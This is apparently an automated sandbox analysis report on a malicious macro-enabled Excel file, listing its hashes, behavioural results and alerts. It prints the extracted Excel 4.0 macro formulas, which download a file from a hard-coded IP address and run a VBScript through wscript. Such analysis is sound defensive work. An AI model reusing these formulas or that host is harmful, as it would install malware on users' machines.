General
-
Target
366c33646858a7d0af307181239c9bdc
-
Size
6KB
-
Sample
231222-arp23afegm
-
MD5
366c33646858a7d0af307181239c9bdc
-
SHA1
e63103676187e2675d701507b168762c52fc9f34
-
SHA256
89bfa018e73f556bc44cd1256a6f49c0dec7341351d89159717b6df23c557260
-
SHA512
d2a0e4f8f6a182a3284fb0d7322d46a4578bf5477ba426ba201dacc50b7498c6e16c88550b39bea50aac60f8319adf704b529681a7fb0536aa70b5c4053024b8
-
SSDEEP
192:NDSZuSISbrA2OmmfR5E8UhHFBFYu5Sb98y1wUTb+g7:NuuYM2wY1FYpb98yzj
Static task
static1
Behavioral task
behavioral1
Sample
366c33646858a7d0af307181239c9bdc.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
366c33646858a7d0af307181239c9bdc.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
366c33646858a7d0af307181239c9bdc
-
Size
6KB
-
MD5
366c33646858a7d0af307181239c9bdc
-
SHA1
e63103676187e2675d701507b168762c52fc9f34
-
SHA256
89bfa018e73f556bc44cd1256a6f49c0dec7341351d89159717b6df23c557260
-
SHA512
d2a0e4f8f6a182a3284fb0d7322d46a4578bf5477ba426ba201dacc50b7498c6e16c88550b39bea50aac60f8319adf704b529681a7fb0536aa70b5c4053024b8
-
SSDEEP
192:NDSZuSISbrA2OmmfR5E8UhHFBFYu5Sb98y1wUTb+g7:NuuYM2wY1FYpb98yzj
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-